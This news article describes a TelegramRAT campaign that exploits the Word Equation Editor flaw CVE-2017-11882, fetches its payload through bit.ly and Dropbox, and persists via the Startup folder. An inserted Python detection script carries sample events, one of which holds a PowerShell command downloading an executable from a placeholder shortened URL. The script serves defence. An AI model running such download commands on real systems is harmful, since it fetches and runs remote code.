
Open-Source Tools and Cloud Services at the Heart of Destructive TelegramRAT Malware Campaign

Researchers from Netskope recently stumbled upon a campaign distributing a strain of malware dubbed TelegramRAT. As the 'RAT' part of the name suggests, TelegramRAT is a Remote Access Trojan (RAT), and it's designed to perform quite a few malicious tasks.

The list includes executing shell commands, freezing the keyboard, keylogging, running, copying, moving and deleting files, opening a proxy server, recording audio through the microphone, taking screenshots, gathering information about the PC, changing the wallpaper, shutting down and rebooting the computer, etc. It's a long list, but it must be said that most of the RATs out there are also multi-talented. So, what's special about TelegramRAT?

The hackers are making use of CVE-2017-11882, an MS Word vulnerability that has existed for a whopping 17 years but was only discovered last month. It allows remote code execution through Microsoft's Equation Editor (the component that allows Office users to view and edit mathematical equations), and although November's Patch Tuesday fixed the security hole, campaigns observed over the last few weeks show that there's no shortage of outdated software that can still be exploited.

For TelegramRAT's campaign, the black hats embedded an OLE object inside a Word document called Adventurer LOG.doc. It's not clear whether the attack was targeted, and the distribution method is not mentioned in Netskope's blog, either. We do know what the malicious doc does, though.

The embedded OLE object executes a PowerShell script which downloads and runs the payload from a bit.ly link. When expanded, the shortened URL points to a Dropbox location (which was taken down after Netskope got in touch with the cloud storage provider). This is not the first time hackers have used either bit.ly or Dropbox in their campaigns, and the fact that they're still employing them shows that these services remain an effective way of distributing malware.

The downloaded payload writes itself to %AppData%\MSOffice, and it also places a shortcut of itself in the Startup folder inside the Start Menu. This ensures that TelegramRAT runs every time the computer boots up.
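The infection chain described in the two paragraphs above (Equation Editor spawning PowerShell, a download via a URL shortener, a large executable dropped into %AppData%\MSOffice, and a shortcut written to the Startup folder) can be expressed as endpoint detection rules. The following is an added example, not code from the article or from Netskope; the event format and the sample events are constructed for illustration.

```python
import re

# Constructed sample telemetry in a simplified Sysmon-like shape; these events
# are made up for this example and are not taken from Netskope's report.
SAMPLE_EVENTS = [
    {"type": "process", "parent": "WINWORD.EXE", "image": "EQNEDT32.EXE", "cmd": ""},
    {"type": "process", "parent": "EQNEDT32.EXE", "image": "powershell.exe",
     "cmd": "powershell -w hidden (New-Object Net.WebClient).DownloadFile('https://bit.ly/EXAMPLE','x.exe')"},
    {"type": "file", "image": "powershell.exe", "size": 16_777_216,
     "path": r"C:\Users\alice\AppData\Roaming\MSOffice\x.exe"},
    {"type": "file", "image": "x.exe", "size": 1_200,
     "path": r"C:\Users\alice\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x.lnk"},
    {"type": "process", "parent": "explorer.exe", "image": "WINWORD.EXE", "cmd": "WINWORD.EXE report.docx"},
]

SCRIPT_HOSTS = {"powershell.exe", "cmd.exe", "mshta.exe", "wscript.exe", "cscript.exe"}
SHORTENERS = re.compile(r"https?://(bit\.ly|goo\.gl|tinyurl\.com)/", re.I)
STARTUP_LNK = re.compile(r"\\start menu\\programs\\startup\\[^\\]+\.lnk$", re.I)
APPDATA_MSOFFICE = re.compile(r"\\appdata\\roaming\\msoffice\\[^\\]+\.exe$", re.I)


def detect(events):
    """Return (rule, detail) pairs for events matching the TelegramRAT chain."""
    findings = []
    for e in events:
        image, parent = e.get("image", "").lower(), e.get("parent", "").lower()
        if e["type"] == "process":
            # Equation Editor has no legitimate reason to launch a script host.
            if parent == "eqnedt32.exe" and image in SCRIPT_HOSTS:
                findings.append(("equation_editor_spawn", image))
            # Script host fetching its payload through a URL shortener.
            m = SHORTENERS.search(e.get("cmd", ""))
            if m and image in SCRIPT_HOSTS:
                findings.append(("shortener_download", m.group(1).lower()))
        elif e["type"] == "file":
            path = e["path"]
            # Executable dropped into %AppData%\MSOffice; report its size in MB.
            if APPDATA_MSOFFICE.search(path):
                findings.append(("appdata_msoffice_drop", f"{e['size'] // (1024 * 1024)}MB"))
            # Shortcut written into the Startup folder by something other than Explorer.
            if STARTUP_LNK.search(path) and image != "explorer.exe":
                findings.append(("startup_persistence", image))
    return findings


if __name__ == "__main__":
    for rule, detail in detect(SAMPLE_EVENTS):
        print(rule, detail)
```

Each rule on its own is noisy in some environments; the chain is what matters, so correlate the four hits by host and time window before alerting.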

After dissecting it, the researchers found out that TelegramRAT is pretty much a carbon copy of RAT-via-Telegram, a project that was uploaded to GitHub several months ago. It's basically a Remote Access Tool that doesn't receive commands from a C&C server. Instead, the RAT's operators create a simple bot which uses the Telegram messaging application and communicate with the software through it. The advantage, the author of RAT-via-Telegram said, is a simple yet secure way of sending commands thanks to Telegram's end-to-end encryption.

As you might expect, the author (the original repository has been taken down, but there are copies aplenty) also pointed out that the RAT is to be used for educational purposes only, but, well, you can see what's happened.

So, to recap, the TelegramRAT gang basically took an open-source tool, made no modifications to it, and used free, publicly available services to make users' lives difficult. They spent minimum time and effort on creating a C&C infrastructure, and they exploited a known vulnerability that the victims should have patched. They don't look like the most sophisticated group of cybercriminals. That said, their RAT is still dangerous.

The payload itself weighs in at 16MB because the original tool was written in Python. Windows doesn't ship with a Python interpreter, so one had to be bundled inside the payload. As a result, the file is unusually large for a malware sample, and some scanners might fail to take a proper look at it. In addition to this, traffic to the location hosting the actual payload is unlikely to be flagged as suspicious because Dropbox is a legitimate service used by millions around the world.

There was a time when launching a cyber attack involved quite a lot more than registering a few free accounts and copy/pasting some open-source code. Unfortunately, times have changed.
